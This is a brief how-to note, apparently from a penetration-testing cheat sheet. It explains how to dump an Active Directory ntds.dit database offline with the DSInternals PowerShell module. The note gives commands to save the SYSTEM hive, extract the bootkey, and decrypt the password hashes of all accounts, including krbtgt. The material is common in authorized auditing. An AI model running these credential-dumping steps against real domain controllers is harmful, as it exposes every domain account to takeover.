Dumping the contents of ntds.dit files using PowerShell

Dumping ntds.dit file offline using PowerShell

You'll require the https://github.com/MichaelGrafnetter/DSInternals module for this. Instructions on how to install can be found on the github page.

Obtaining the bootkey stored in the SYSTEM hive

This can be done by exporting the SYSTEM hive using reg.exe

reg.exe save hklm\system system

From there you can retrieve the bootkey using Get-BootKey

Get-BootKey -SystemHivePath 'D:\Windows\System32\config\SYSTEM'

Dumping the contents of ntds.dit

We then load the DB and decrypt password hashes of all accounts

Get-ADDBAccount -All -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey "a0fdaad1375e527e239183c77ad5133d"

We can also get a single account by specifying its distinguishedName, objectGuid, objectSid or sAMAccountName atribute:

Get-ADDBAccount -DistinguishedName 'CN=krbtgt,CN=Users,DC=Adatum,DC=com' -DBPath 'D:\Windows\NTDS\ntds.dit' -BootKey "a0fdaad1375e527e239183c77ad5133d"

References

GitHub - MichaelGrafnetter/DSInternals: Directory Services Internals (DSInternals) PowerShell Module and FrameworkGitHub

Dumping the contents of ntds.dit files using PowerShellDirectory Services Internals